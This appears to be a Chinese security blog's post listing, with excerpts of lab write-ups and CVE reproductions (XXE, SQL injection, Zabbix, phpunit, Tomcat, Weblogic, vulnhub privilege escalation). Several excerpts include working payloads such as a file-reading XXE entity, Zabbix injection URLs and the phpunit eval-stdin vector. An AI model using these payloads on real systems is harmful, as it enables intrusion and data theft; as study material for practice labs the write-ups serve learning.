- 博客(44)
- 资源 (4)
- 收藏
- 关注
原创 GO 语言解析xml
复现漏洞的时候遇到了xml解析问题之前没搞过记录一下一个xml在线格式化网站(https://tool.oschina.net/codeformat/xml)对于go语言解析xml需要用到结构体而图中的xml有两层嵌套就需要通过结构体来套结构体实现解析以上图为例第一层结构体type 第一层 struct{ //第一层的xml入口 XMLName xml.Name `xml:"authenticationserver"` //对应解析server Server Seconding(第
2021-03-23 11:57:34 805
原创 xxe 复习
XXEXXE攻击大多是由解析器发出外部资源请求而造成的。引用外部实体时,引用SYSTEM、PUBLIC申请外部资源,利用其它协议造成的危害。攻击方式引用外部实体远程文件读取url请求,造成ssrf攻击使用expect直接执行命令参数实体Dos攻击支持协议ftphttpphpfile等借用先知社区的图(https://xz.aliyun.com/t/3357#toc-9)无回显的xxe即通过协议来发送内容vps端test.dtd<!ENTITY %
2021-03-11 18:49:57 268 1
原创 sql 复习
sql注入原理攻击者构建特殊的输入作为参数传入到web应用程序,在代码里面直接与SQL语句进行拼接,执行SQL语句从而执行攻击者的恶意代码,获取敏感数据或者写入shell。布尔盲注和时间盲注的区别应用程序执行payload过后,有正常页面和异常页面,使用布尔盲注执行payload过后,只有一种页面,但是可以通过时间延迟来判断,使用时间盲注二次注入原理和常见情形二次注入的原理主要就是入库和出库,当用户输入特殊字符时,服务端进行了转义,然后将数据插入到数据库中,但是数据插入到数据库中时转义
2021-03-11 15:52:32 167
原创 javaweb 报错记录
在executeUpdate中加入sql就会报错只能执行静态插入,去掉即可正常运行java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '?, ?)' at line 1 at com.mysql.cj.jdbc.exc
2020-12-15 08:34:38 1017
原创 ms17_010问题 待续
问题一Pwned! Eternalblue success![*] Started reverse TCP handler on 192.168.1.108:4444 [*] 192.168.1.114:445 - Generating Eternalblue XML data[*] 192.168.1.114:445 - Generating Doublepulsar XML data[*] 192.168.1.114:445 - Generating payload DLL for Doub
2020-12-07 20:36:41 680
原创 89c51 步进电动机
步进电动机步进电机是一种将电脉冲信号转换成相应角位移或线位移的电动机。每输入一个脉冲信号,转子就转动一个角度或前进一步,其输出的角位移或线位移与输入的脉冲数成正比,转速与脉冲频率成正比。因此,步进电动机又称脉冲电动机。步进电动机的结构形式和分类方法较多,一般按励磁方式分为磁阻式、永磁式和混磁式三种;按相数可分为单相、两相、三相和多相等形式。本次使用的是4项步进电动机采用单极性直流电源供电。只要对步进电机的各相绕组按合适的时序通电,就能使步进电机步进转动。开始时,开关SB接通电源,SA、SC、SD
2020-11-30 23:48:51 1220
原创 MD5 加盐 数字签名
main.py#!/usr/bin/env python# encoding: utf-8'''# @Time : 2020/11/17 9:59# @Author : fedsz# @Site : # @File : main.py# @Software: PyCharm'''import sysfrom PyQt5.QtCore import QStringListModelfrom PyQt5.QtWidgets import QApplication
2020-11-26 13:02:01 682 1
原创 从buuctf 简单学习xxe
buuctf抓包发现可以xxepayload<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE hack [<!ENTITY file SYSTEM "file://文件">]><user> <username>&file;</username> <password>hack</password></user&g
2020-11-08 19:14:07 1277
原创 CVE-2016-10134 zabbix 复现
注入点1需要登录获取cooike后16位/latest.php?output=ajax&sid=【cooike zbx——sessionid后16位】&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)注入点2jsrpc.php 无需登录/jsrpc.php?type=0&mode=1&method=screen.get&pro
2020-11-02 12:42:57 224
原创 CVE-2017-8386 git沙盒绕过
vulhub的cve-2017-8386 sudo ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"shift+e!+命令
2020-10-17 17:52:18 510
原创 phpunit 远程代码执行漏洞
phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php有一个evaleval('?>'.file_get_contents('php://input'));直接将PHP代码作为POST Body发送即可执行php代码...
2020-10-16 13:10:59 1566
原创 tar cap_dac_read_search
/usr/bin/tar = cap_dac_read_search+ep靶机connect-the-dots1在枚举权限的时候发现tar有读写权限就可以将某一个文件打包然后再读取
2020-10-06 09:51:40 591
原创 lemonsqueezy1
目录爆破发现时wordpresswpscan两个用户通过rockyou爆破密码得到orange ginger登录wordpress找到密码登录phpmyadmin创建用户写入后门反弹shell上传枚举脚本/etc/logrotate.d/logrotate可写并以cronjob运行msfvenom生成shell写入等待反弹...
2020-10-02 17:42:57 524
原创 Glasgow Smile
dirb 扫描目录发现 joomlajoomscan扫一下cewl -m 5 http://192.168.1.106/joomla/ > dic-words.txt生成字典爆破用户名密码得到joomla Gotham登录后把index.php改成shell访问并得到shell在webconfig中·发现mysql用户名密码登录mysql找到rob登录密码ssh登录找到一串rot13再base64更换用户去网站根目录下枚举文件看见一个隐藏文件开启pythonhttp服务
2020-10-02 16:09:07 337
原创 滥用sudo提权 Zico2 (zip)
扫描靶机开放端口访问发现一个商城模板简单测试发现一个文件包含msf姿势不对寻找其他方法扫描目录发现一个dbadmin,访问出现了phpliteadmin再试msf找到exp复制到当前目录看到有默认密码admin登录数据库按照所给步骤一步一步执行成功执行命令反弹shell在home目录下发现zico,在zico发现一个wordpress在config.php发现了用户名密码ssh登录发现有zip指令和tar指令是root权限通过zip命令执行其他命令利用-command...
2020-09-17 17:22:25 162
原创 滥用sudo 权限的提权 DC-4靶机
靶机开放了22 80 端口给了用户名Admin 通过/usr/share/wordlists/rockyou.txt进行爆破得到密码happy在command.php下有通过抓包发现是由post执行指令在/home/jim/backups发现一个old-passwords.bakcat一下得到一串密码再查看/etc/passwd使用现有的用户名和密码进行暴力破解sshhydra -L 用户名 -P 密码 192.168.1.100 ssh爆破出用户名jim时密码为jibril
2020-09-16 18:16:57 299
原创 滥用sudo 提权 vulnhub Me and My Girlfreind
端口扫描发现开启了22和80端口访问得到这个网站只能在本地访问fake一个假ip看见能注册先注册一个账号在测试page参数时没有发现问题在登录测试时发现了可能的越权并且能获得密码但是这个登录不了ssh再遍历用户在目录下找到第一个flag和提示在查找权限的时候发现php命令可以用是root权限生成后门设置监听并执行后门成功取得root...
2020-09-16 17:11:14 146
原创 CVE-2020-1472 poc复现
测试脚本(https://github.com/SecuraBV/CVE-2020-1472)python3 exp NetBIOS名称(域名)ip搭建winsever2016主域控制器搭建(https://blog.51cto.com/lizmfinder/2127943)
2020-09-15 22:23:19 485
原创 win10更新后发生 CRITICAL_PROCESS_DIED 蓝屏
用管理员模式启动命令行(cmd)用sfc /scannow修复一下损坏文件因为直接替换所以不会有大问题除非把有你的信息的文件替换了如果不行使用DISM /Online /Cleanup-image /RestoreHealth如果还不行chkdsk /f /r c:然后重启等着自动修复参考链接(https://www.youtube.com/watch?v=u2bT4aAIc8E)...
2020-09-08 02:48:25 8320 6
原创 通达OA11.6复现
安装通达OA使用exp复现exp地址(https://github.com/TomAPU/poc_and_exp/blob/master/rce.py)某信服rce
2020-08-19 22:13:24 690 1
原创 Torment-vulnhub靶机记录
开始经典的主机发现端口扫描有21端口可以开心的匿名登录成功登录并发现有ssh 和一个没见过的ngircd跟进发现有一个密钥和一个channelsget下来首先尝试一下ngircd登录apt-get install hexchatapt-get install ngircd添加靶机地址(密码是后加的)但是没有密码因为用到的是ngircd尝试用其默认密码登录cd /etc/ngircdcat ngircd.conf在配置文件中找到默认密码wealllikedebian登录并
2020-08-11 22:47:17 302
原创 vulnhub DC-2
主机发现扫描端口开放了80和22端口80端口被重定向到dc-2修改hostssudo vim /ect/hosts访问看到flagwordpress进行wpsscansudo wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u三个用户名也就是需要爆破首先生成字典cewl http://dc-2/ > password然后爆破sudo wpscan --url http://dc-2
2020-08-10 22:38:21 157
原创 sudo 滥用提权 Sunset: Vulnhub
vulhub https://www.vulnhub.com/entry/sunset-1,339/主机发现 扫描端口21 22端口尝试无头登录得到一个 backup文件是hash可以同过john爆破由于辣鸡电脑爆破不出来py了密码 cheer14 用户名 sunsetssh登录sudo提权本次靶机给的是ed命令作用:Linux ed命令是文本编辑器,用于文本编辑。ed是Linux中功能最简单的文本编辑程序,一次仅能编辑一行而非全屏幕方式的操作补充sudo滥用提权sudo
2020-08-10 01:06:21 287
原创 从 Matrix: 1 Vulnhub 学习rbash
开局靶机正常配置走host-onlynmap进行主机发现,找到对应的主机,扫描端口开启了访问80端口啥都没有,于是访问31337端口在源码发现一串base64解密后发现一个文件,通过web访问是一个brainfuck文件(https://www.splitbrain.org/_static/ook/)在线解密得到前6位密码使用crunch创建一个单词表,进行ssh登录爆破crunch 8 8 -t k1ll0r%@ -o dict.txthydra -l guest -P di
2020-08-09 22:52:38 179
原创 OPENSSH 漏洞cve-2020-15778
OPENSSH 漏洞cve-2020-15778参考链接(https://github.com/cpandya2909/CVE-2020-15778)受影响的组件:SCP漏洞版本:<= openssh-8.3p1漏洞前提:需要登录密码scp ./1.txt msfadmin@192.168.3.29:/tmp/success成功上传作为验证也可以反弹...
2020-08-03 11:44:51 1095 2
原创 复现 CVE-2020-0796
CVE-2020-0796远程代码执行复现影响范围Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit S
2020-08-01 05:26:56 257
原创 CAS4.1反序列化漏洞vulhub
CAS复现环境vulhubApereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。漏洞原理使用了默认密钥changeitpublic class EncryptedTranscoder implements Transcoder { private CipherBean cipherBean; private boolean co
2020-07-31 20:53:31 2673
原创 心脏滴血复现 CVE-2014-0160
心脏出血漏洞(CVE-2014-0160)复现环境vulhub两种方式进行检测在线https://filippo.io/Heartbleed使用msf的au模块进行扫描启动docker启动msf查找CVE-2014-0160使用第一个敏感信息泄露的扫描模块
2020-07-23 22:29:06 264
原创 CVE-2020-10199 远程命令执行漏洞
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。复现环境 vulhub复现漏洞首先要知道用户名和密码,vulhub已经给出admin/admin使用msf5搜索exp CVE-2020-10199use exp查看选项 show optionsx需要配置Rhost,Lhost ,password和portcheck一下目标脆弱可以runls...
2020-07-23 17:12:25 2712
原创 BeginnersMisc tsgctf 2020
BeginnersMisc tsgctf 2020exploit = input('? ')if eval(b64encode(exploit.encode('UTF-8'))) == math.pi: print(open('flag.txt').read())源码是这个,要构造utf-8加密后再base64加密与math.pi相等可以构造‘340/340+340/340+340/340+776/140/140+340/3400’...
2020-07-22 10:05:08 175
原创 Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)复现环境vulhubexp#! -*- coding:utf-8 -*-# url ip/?cmd=env&pwd=023import httplibimport sysimport timebody = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public sta
2020-07-20 21:45:21 210
原创 PHP环境 XML外部实体注入漏洞(XXE)
PHP环境 XML外部实体注入漏洞(XXE)简介:PHP 7.0.30libxml 2.8.0复现环境vulhubexec进入docker有三个文件dom.php 使用DOMDocument解析bodySimpleXMLElement.php 使用SimpleXMLElement类解析bodysimplexml_load_string.php 使用simplexml_load_string函数解析body相应代码如下root@e1ccaae36891:/var/www/html#
2020-07-19 20:16:53 820
原创 CVE-2019-11043 漏洞复现
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)漏洞介绍在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。复现环境vnlhub复现exp需要安装go语言环境apt-get install golang -y然后换个源(国内)go en
2020-07-19 19:18:31 1676
原创 Flask(Jinja2) 服务端模板注入漏洞 复现
Flask(Jinja2) 服务端模板注入漏洞复现环境vulhub访问ip/?name={{a*b}}使用tplmap一把梭`from flask import Flask, requestfrom jinja2 import Templateapp = Flask(name)@app.route("/")def index():name = request.args.get(‘name’, ‘guest’)t = Template("Hello " + name)return t.r
2020-07-19 13:37:24 333
原创 Weblogic(CVE-2017-10271)
Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)影响版本 Weblogic < 10.3.6触发位置 http://ip:7001/wls-wsat/CoordinatorPortType通过post提交poc即可成功运行以及poc测试脚本,参考(https://www.cnblogs.com/xiaozi/p/8205107.html)#!/usr/bin/env python# coding:utf
2020-07-18 23:58:48 531
原创 Weblogic 任意文件上传漏洞(CVE-2018-2894)
Weblogic 任意文件上传漏洞(CVE-2018-2894)简介Orzacle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。影响范围Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。复现环境 vulhub登录密码do
2020-07-18 19:22:57 198
原创 CVE-2017-14849复现
CVE-2017-14849复现cve描述Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to “…” handling was incompatible with the pathname validation used by unspecified community modules.意思是node.js 8.5.0 到8.6.0 之间的版本会造成目录穿
2020-07-18 15:55:14 353
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人